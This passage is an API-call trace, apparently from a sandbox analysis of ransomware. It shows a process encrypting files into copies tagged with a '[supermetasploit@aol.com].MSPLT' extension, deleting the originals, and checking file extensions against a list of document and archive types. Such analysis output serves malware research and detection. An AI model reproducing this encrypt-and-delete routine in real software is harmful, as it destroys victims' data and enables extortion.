"c:\\588bce7c90097ed212\\1055\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0171.733] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0171.733] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.733] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0171.734] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.262] GetLastError () returned 0x0 [0172.262] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0xf13, lpOverlapped=0x0) returned 1 [0172.285] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf20, lpOverlapped=0x0) returned 1 [0172.286] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0172.286] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe4, lpOverlapped=0x0) returned 1 [0172.287] SetEndOfFile (hFile=0x2f4) returned 1 [0172.287] CloseHandle (hObject=0x2f4) returned 1 [0172.288] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.288] SetEndOfFile (hFile=0x358) returned 1 [0172.289] CloseHandle (hObject=0x358) returned 1 [0172.289] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.290] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 1 [0172.302] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.302] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.302] lstrlenW (lpString=".doc") returned 4 [0172.302] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.302] lstrlenW (lpString=".docx") returned 5 [0172.302] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.302] lstrlenW (lpString=".pdf") returned 4 [0172.302] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.302] lstrlenW (lpString=".xls") returned 4 [0172.302] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.302] lstrlenW (lpString=".xlsx") returned 5 [0172.302] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.302] lstrlenW (lpString=".ppt") returned 4 [0172.302] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.302] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.302] lstrlenW (lpString=".zip") returned 4 [0172.302] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.303] lstrlenW (lpString=".rar") returned 4 [0172.303] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.303] lstrlenW (lpString=".bz2") returned 4 [0172.303] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.303] lstrlenW (lpString=".7z") returned 3 [0172.303] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.303] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.303] lstrlenW (lpString=".dbf") returned 4 [0172.303] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.303] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.303] lstrlenW (lpString=".1cd") returned 4 [0172.303] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.303] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.303] lstrlenW (lpString=".jpg") returned 4 [0172.303] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.303] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.303] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.303] lstrlenW (lpString=".doc") returned 4 [0172.303] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.303] lstrlenW (lpString=".docx") returned 5 [0172.303] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.303] lstrlenW (lpString=".pdf") returned 4 [0172.303] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.303] lstrlenW (lpString=".xls") returned 4 [0172.303] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.303] lstrlenW (lpString=".xlsx") returned 5 [0172.304] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.304] lstrlenW (lpString=".ppt") returned 4 [0172.304] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.304] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.304] lstrlenW (lpString=".zip") returned 4 [0172.304] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.304] lstrlenW (lpString=".rar") returned 4 [0172.304] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.304] lstrlenW (lpString=".bz2") returned 4 [0172.304] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.304] lstrlenW (lpString=".7z") returned 3 [0172.304] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.304] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.304] lstrlenW (lpString=".dbf") returned 4 [0172.304] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.304] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.304] lstrlenW (lpString=".1cd") returned 4 [0172.304] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.304] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0172.304] lstrlenW (lpString=".jpg") returned 4 [0172.304] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.304] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0172.304] lstrlenW (lpString="eula.rtf") returned 8 [0172.304] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.309] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=4015) returned 1 [0172.310] CloseHandle (hObject=0x2f4) returned 1 [0172.310] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 0x80 [0172.310] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.310] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.310] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.310] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.310] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.310] GetLastError () returned 0x0 [0172.310] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0xfaf, lpOverlapped=0x0) returned 1 [0172.322] WriteFile (in: hFile=0x348, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xfb0, lpOverlapped=0x0) returned 1 [0172.324] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0172.324] WriteFile (in: hFile=0x348, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe4, lpOverlapped=0x0) returned 1 [0172.324] SetEndOfFile (hFile=0x348) returned 1 [0172.324] CloseHandle (hObject=0x348) returned 1 [0172.326] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.326] SetEndOfFile (hFile=0x2f4) returned 1 [0172.327] CloseHandle (hObject=0x2f4) returned 1 [0172.327] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.327] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 1 [0172.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.328] lstrlenW (lpString=".doc") returned 4 [0172.328] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.328] lstrlenW (lpString=".docx") returned 5 [0172.328] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.328] lstrlenW (lpString=".pdf") returned 4 [0172.328] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.328] lstrlenW (lpString=".xls") returned 4 [0172.328] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.328] lstrlenW (lpString=".xlsx") returned 5 [0172.328] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.328] lstrlenW (lpString=".ppt") returned 4 [0172.328] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.328] lstrlenW (lpString=".zip") returned 4 [0172.328] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.328] lstrlenW (lpString=".rar") returned 4 [0172.328] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.328] lstrlenW (lpString=".bz2") returned 4 [0172.328] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.328] lstrlenW (lpString=".7z") returned 3 [0172.328] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.328] lstrlenW (lpString=".dbf") returned 4 [0172.328] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.328] lstrlenW (lpString=".1cd") returned 4 [0172.328] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.328] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.328] lstrlenW (lpString=".jpg") returned 4 [0172.329] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.329] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.329] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.329] lstrlenW (lpString=".doc") returned 4 [0172.329] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0172.329] lstrlenW (lpString=".docx") returned 5 [0172.329] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0172.329] lstrlenW (lpString=".pdf") returned 4 [0172.329] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0172.329] lstrlenW (lpString=".xls") returned 4 [0172.329] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0172.329] lstrlenW (lpString=".xlsx") returned 5 [0172.329] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0172.329] lstrlenW (lpString=".ppt") returned 4 [0172.329] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0172.329] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.329] lstrlenW (lpString=".zip") returned 4 [0172.329] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0172.329] lstrlenW (lpString=".rar") returned 4 [0172.329] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0172.330] lstrlenW (lpString=".bz2") returned 4 [0172.330] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0172.330] lstrlenW (lpString=".7z") returned 3 [0172.330] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0172.330] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.330] lstrlenW (lpString=".dbf") returned 4 [0172.330] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0172.330] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.330] lstrlenW (lpString=".1cd") returned 4 [0172.330] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0172.330] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0172.330] lstrlenW (lpString=".jpg") returned 4 [0172.330] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0172.331] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0172.331] lstrlenW (lpString="LocalizedData.xml") returned 17 [0172.331] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.331] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=80254) returned 1 [0172.331] CloseHandle (hObject=0x2f4) returned 1 [0172.331] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 0x80 [0172.331] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.332] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.332] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.332] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.332] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.332] GetLastError () returned 0x0 [0172.332] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1397e, lpOverlapped=0x0) returned 1 [0172.339] WriteFile (in: hFile=0x348, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13980, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13980, lpOverlapped=0x0) returned 1 [0172.342] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0172.342] WriteFile (in: hFile=0x348, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0172.342] SetEndOfFile (hFile=0x348) returned 1 [0172.342] CloseHandle (hObject=0x348) returned 1 [0172.740] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.741] SetEndOfFile (hFile=0x2f4) returned 1 [0172.742] CloseHandle (hObject=0x2f4) returned 1 [0172.742] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0172.743] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 1 [0172.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.743] lstrlenW (lpString=".doc") returned 4 [0172.743] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.743] lstrlenW (lpString=".docx") returned 5 [0172.743] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.743] lstrlenW (lpString=".pdf") returned 4 [0172.743] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.743] lstrlenW (lpString=".xls") returned 4 [0172.743] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.743] lstrlenW (lpString=".xlsx") returned 5 [0172.743] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.743] lstrlenW (lpString=".ppt") returned 4 [0172.743] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.743] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.744] lstrlenW (lpString=".zip") returned 4 [0172.744] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.744] lstrlenW (lpString=".rar") returned 4 [0172.744] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.744] lstrlenW (lpString=".bz2") returned 4 [0172.744] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.744] lstrlenW (lpString=".7z") returned 3 [0172.744] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.744] lstrlenW (lpString=".dbf") returned 4 [0172.744] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.744] lstrlenW (lpString=".1cd") returned 4 [0172.744] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.744] lstrlenW (lpString=".jpg") returned 4 [0172.744] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.744] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.744] lstrlenW (lpString=".doc") returned 4 [0172.744] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0172.744] lstrlenW (lpString=".docx") returned 5 [0172.744] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0172.744] lstrlenW (lpString=".pdf") returned 4 [0172.744] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0172.744] lstrlenW (lpString=".xls") returned 4 [0172.744] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0172.745] lstrlenW (lpString=".xlsx") returned 5 [0172.745] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0172.745] lstrlenW (lpString=".ppt") returned 4 [0172.745] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0172.745] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.745] lstrlenW (lpString=".zip") returned 4 [0172.745] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0172.745] lstrlenW (lpString=".rar") returned 4 [0172.745] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0172.745] lstrlenW (lpString=".bz2") returned 4 [0172.745] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0172.745] lstrlenW (lpString=".7z") returned 3 [0172.745] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0172.745] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.745] lstrlenW (lpString=".dbf") returned 4 [0172.745] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0172.745] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.745] lstrlenW (lpString=".1cd") returned 4 [0172.745] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0172.745] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 44 [0172.745] lstrlenW (lpString=".jpg") returned 4 [0172.745] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0172.745] lstrcmpiW (lpString1=".html", lpString2=".MSPLT") returned -1 [0172.745] lstrlenW (lpString="DHtmlHeader.html") returned 16 [0172.745] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.746] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=16118) returned 1 [0172.746] CloseHandle (hObject=0x2f4) returned 1 [0172.747] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html")) returned 0x80 [0172.747] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0172.747] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0172.748] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.748] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.748] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0172.748] GetLastError () returned 0x0 [0172.748] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x3ef6, lpOverlapped=0x0) returned 1 [0172.766] WriteFile (in: hFile=0x348, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x3f00, lpOverlapped=0x0) returned 1 [0172.768] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0172.768] WriteFile (in: hFile=0x348, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf4, lpOverlapped=0x0) returned 1 [0172.768] SetEndOfFile (hFile=0x348) returned 1 [0172.768] CloseHandle (hObject=0x348) returned 1 [0172.770] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0172.770] SetEndOfFile (hFile=0x2f4) returned 1 [0172.772] CloseHandle 